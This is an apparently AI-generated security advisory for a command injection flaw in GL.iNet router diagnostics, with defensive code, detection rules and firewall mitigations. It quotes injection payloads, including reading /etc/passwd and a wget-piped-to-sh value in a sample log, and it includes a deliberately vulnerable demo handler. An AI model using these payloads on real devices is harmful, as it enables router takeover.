CVE-2022-31898 Overview
CVE-2022-31898 is a command injection vulnerability affecting GL.iNet travel routers, specifically the GL-MT300N-V2 Mango and GL-AX1800 Flint models. Multiple command injection flaws were discovered in the ping_addr and trace_addr function parameters, allowing authenticated attackers with administrative privileges on an adjacent network to execute arbitrary operating system commands on the affected devices.
Critical Impact
Authenticated attackers with high privileges on an adjacent network can achieve complete system compromise through arbitrary command execution, potentially leading to full device takeover, network pivoting, and persistent backdoor installation.
Affected Products
- GL.iNet GL-MT300N-V2 (Mango) firmware version 3.212
- GL.iNet GL-AX1800 (Flint) firmware version 3.214
- The NVD entry also lists the GL-MT300N-V2 and GL-AX1800 hardware platforms themselves as affected configurations; the flaw is in the firmware, so any unit running the versions above is affected regardless of hardware revision
Discovery Timeline
- 2022-10-27 - CVE-2022-31898 published to NVD
- 2025-05-07 - Last updated in NVD database
Technical Details for CVE-2022-31898
Vulnerability Analysis
This vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command), commonly known as OS command injection. The affected GL.iNet routers fail to properly sanitize user-supplied input within the diagnostic functionality of the router's administrative interface. When an authenticated administrator initiates network diagnostic operations such as ping or traceroute, the ping_addr and trace_addr parameters are passed directly to underlying shell commands without adequate input validation or sanitization.
The attack requires the adversary to be on an adjacent network (the router's LAN or Wi-Fi) and to hold administrative credentials for the web interface. Despite those preconditions, successful exploitation runs arbitrary commands with the privileges of the process that invokes ping and traceroute; on OpenWrt-based firmware such as GL.iNet's, the web server and its API handlers typically run as root, so a single injection yields full control of the device.
Root Cause
The root cause of this vulnerability lies in the improper handling of user input in the network diagnostic functions. The router's firmware directly incorporates user-controlled values from the ping_addr and trace_addr parameters into shell command strings without proper sanitization, escaping, or validation. This allows specially crafted input containing shell metacharacters or command separators to break out of the intended command context and execute attacker-supplied commands.
Attack Vector
The attack vector requires adjacent network access combined with administrative credentials. An attacker must first authenticate to the router's administrative interface, then navigate to the network diagnostic functionality. By injecting shell metacharacters such as semicolons (;), pipes (|), backticks (`), or command substitution syntax ($(...)) into the ping address or trace address input fields, the attacker can append or substitute arbitrary commands that will be executed by the underlying operating system.
For example, submitting 127.0.0.1; cat /etc/passwd as the ping address makes the shell run the intended ping and then cat /etc/passwd, a harmless proof that arbitrary commands execute (on the wire the payload is URL- or JSON-encoded, so the ; may appear as %3B). The same separator can introduce a reverse shell, a wget of a second-stage binary, firewall changes via iptables or uci, or a persistent entry in /etc/rc.local.
Technical analysis and further details are available in the Boschko Analysis of GL.iNet Router.
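The pattern described above, shown as an added illustration rather than GL.iNet's firmware code: a handler that splices ping_addr into a shell string beside a hardened version that validates against an allowlist and execs without a shell. The function names, the argv layout and the echo-based dry run (so the demo runs offline without a ping binary) are assumptions; the router's real handler lives in its web API and is not reproduced here.

```python
"""Added illustration (not GL.iNet firmware code): the CWE-78 pattern behind
CVE-2022-31898 and a hardened replacement. Names and the echo-based dry run
are assumptions made for this example."""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and interior hyphens.
_HOST_RE = re.compile(
    r"(?=.{1,253}\Z)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
)


def is_valid_target(addr: str) -> bool:
    """Allowlist check: an IPv4/IPv6 literal or a plain hostname, nothing else.
    Shell metacharacters, whitespace and a leading '-' (option injection) all fail."""
    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        return _HOST_RE.fullmatch(addr) is not None


def ping_vulnerable(ping_addr: str, dry_run: bool = True) -> str:
    """Vulnerable pattern: the parameter is spliced into a shell command string.
    dry_run swaps 'ping' for 'echo ping' so this runs offline; /bin/sh still
    parses an injected ';', '|', '`' or '$(...)' exactly as it would on the router."""
    tool = "echo ping" if dry_run else "ping"
    cmd = f"{tool} -c 1 {ping_addr}"  # no validation, no quoting
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def build_ping_argv(ping_addr: str):
    """Hardened pattern: validate first, then return an argv list for
    subprocess.run (no shell, so metacharacters are inert). None on rejection."""
    if not is_valid_target(ping_addr):
        return None
    return ["ping", "-c", "1", ping_addr]


def ping_hardened(ping_addr: str, dry_run: bool = True) -> str:
    """Execute the validated argv without a shell; raise on bad input."""
    argv = build_ping_argv(ping_addr)
    if argv is None:
        raise ValueError(f"rejected ping_addr: {ping_addr!r}")
    if dry_run:
        argv = ["echo", *argv]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print(ping_vulnerable(payload))   # second output line 'INJECTED' proves execution
    print(build_ping_argv(payload))   # None: rejected before anything is executed
    print(ping_hardened("127.0.0.1"))
```

The allowlist is the important half: quoting the value with shlex.quote would stop the separator, but it still lets an attacker pass ping options such as -f or -I unless a leading hyphen is rejected, which the hostname rule does.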
Detection Methods for CVE-2022-31898
Indicators of Compromise
- Unusual outbound network connections from the router to external IP addresses or command-and-control servers
- Unexpected processes running on the router device, particularly shells spawned by the web server process
- Modified firmware files or configuration changes not initiated by legitimate administrators
- Authentication logs showing administrative access from unexpected adjacent network devices
Detection Strategies
- Monitor the router's administrative interface logs for shell metacharacters (;, |, `, $(...)) in the ping_addr and trace_addr parameters; stock access logs rarely record request parameters, so a reverse proxy or request-body logging in front of the admin interface is usually needed to see them
- Implement network traffic analysis to detect anomalous traffic originating from the router's management interface, such as new outbound connections that begin immediately after a diagnostic request
- Deploy intrusion detection rules for command injection patterns in HTTP requests to router administrative endpoints, matching on the URL-decoded parameter value rather than the raw request so that %3B and %7C are not missed
- Review router configurations periodically for unauthorized changes or new user accounts
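The parameter-level check from the strategies above, as an added example that is not part of the original page: it decodes each request's query string and flags ping_addr or trace_addr values containing shell metacharacters. The log line format, the endpoint paths and the sample lines are constructed for this illustration and are not GL.iNet's; on a real deployment the lines would come from a proxy or WAF that records request parameters.

```python
"""Added example: flagging command-injection attempts against the ping_addr /
trace_addr parameters in request logs. Log format, endpoint paths and sample
lines are constructed for illustration, not taken from GL.iNet firmware."""
import re
from urllib.parse import parse_qs, urlsplit

WATCHED_PARAMS = ("ping_addr", "trace_addr")
# Separators, pipes, redirects and substitution syntax have no place in a host or IP.
META_RE = re.compile(r"[;|&`$<>(){}\r\n]")

# Constructed sample lines (hypothetical format): "<ts> <src> <method> <path?query>"
SAMPLE_LOG = """\
2022-10-27T10:00:01Z 192.168.8.105 POST /cgi-bin/api/diag/ping?ping_addr=8.8.8.8
2022-10-27T10:00:07Z 192.168.8.105 POST /cgi-bin/api/diag/ping?ping_addr=127.0.0.1%3Bcat+/etc/passwd
2022-10-27T10:00:12Z 192.168.8.106 POST /cgi-bin/api/diag/trace?trace_addr=example.com
2022-10-27T10:00:19Z 192.168.8.106 POST /cgi-bin/api/diag/trace?trace_addr=%24(wget+-O-+http://10.0.0.5/x%7Csh)
2022-10-27T10:00:25Z 192.168.8.107 GET /cgi-bin/api/router/status
"""


def extract_params(path_query: str) -> dict:
    """Return URL-decoded parameter -> value for the watched parameters only.
    Decoding first is what makes %3B (';') and %7C ('|') visible to the check."""
    query = urlsplit(path_query).query
    decoded = parse_qs(query, keep_blank_values=True)
    return {k: v[0] for k, v in decoded.items() if k in WATCHED_PARAMS}


def find_injection_attempts(log_text: str) -> list:
    """Scan log lines; return (timestamp, src, param, decoded_value) per hit."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # malformed line, skip rather than crash the scan
        ts, src, _method, path_query = parts
        for param, value in extract_params(path_query).items():
            if META_RE.search(value):
                hits.append((ts, src, param, value))
    return hits


if __name__ == "__main__":
    for ts, src, param, value in find_injection_attempts(SAMPLE_LOG):
        print(f"{ts} {src} {param}={value!r}")
```

Plain IPv4, IPv6 and hostname values pass untouched, so the rule produces no alerts on normal diagnostic use; a hit is worth treating as a compromised or abused administrator session rather than a mistyped address.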
Monitoring Recommendations
- Enable comprehensive logging on GL.iNet devices and forward it off-box to a centralized SIEM; the OpenWrt base system can send syslog to a remote collector via the log_ip and log_port options in /etc/config/system, which also preserves evidence if an attacker clears local logs
- Implement network segmentation to limit adjacent network access to router management interfaces
- Monitor for firmware integrity changes using hash verification against known-good firmware images
- Set up alerts for administrative login attempts from unusual network segments
How to Mitigate CVE-2022-31898
Immediate Actions Required
- Update GL.iNet GL-MT300N-V2 (Mango) from firmware 3.212 to the release GL.iNet lists as fixing CVE-2022-31898
- Update GL.iNet GL-AX1800 (Flint) from firmware 3.214 to the release GL.iNet lists as fixing CVE-2022-31898
- Restrict administrative interface access to trusted networks and devices only
- Set a strong, unique administrator password and rotate it if compromise is suspected; the stock GL.iNet admin panel does not offer a second factor, so credential strength and network reach are the available controls
- Audit administrative access logs for any signs of compromise
Patch Information
GL.iNet users should check the official GL.iNet support website for firmware updates that address this vulnerability. Ensure that firmware versions installed are more recent than the affected versions (3.212 for GL-MT300N-V2 and 3.214 for GL-AX1800). The Boschko Analysis of GL.iNet Router provides additional context on the vulnerability.
Workarounds
- Where the firmware allows it, disable or restrict the ping and traceroute diagnostics in the administrative interface until patched firmware is installed; because exploitation already requires administrator rights, this limits damage from a hijacked session rather than stopping an attacker who holds valid credentials, so pair it with credential rotation and the access controls below
- Implement network access controls to limit which devices can reach the router's administrative interface
- Use firewall rules to block administrative access from untrusted adjacent network segments
- Consider deploying a separate management VLAN with strict access controls for router administration
# Example: restrict management interface access via firewall rules
# Assumption: 192.168.8.10 is the single management host. GL.iNet's default LAN
# is 192.168.8.0/24, so allowing the whole LAN would admit the very "adjacent
# network" this CVE requires. Rules are inserted at the head of INPUT because
# OpenWrt's zone rules already ACCEPT LAN traffic earlier in the chain, so
# appended (-A) rules would never be reached.
iptables -I INPUT 1 -p tcp -m multiport --dports 80,443 -j DROP
iptables -I INPUT 1 -p tcp -m multiport --dports 80,443 -s 192.168.8.10 -j ACCEPT
# Persist the rules (for example in /etc/firewall.user on fw3-based builds);
# plain iptables calls do not survive a reboot or a firewall reload.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

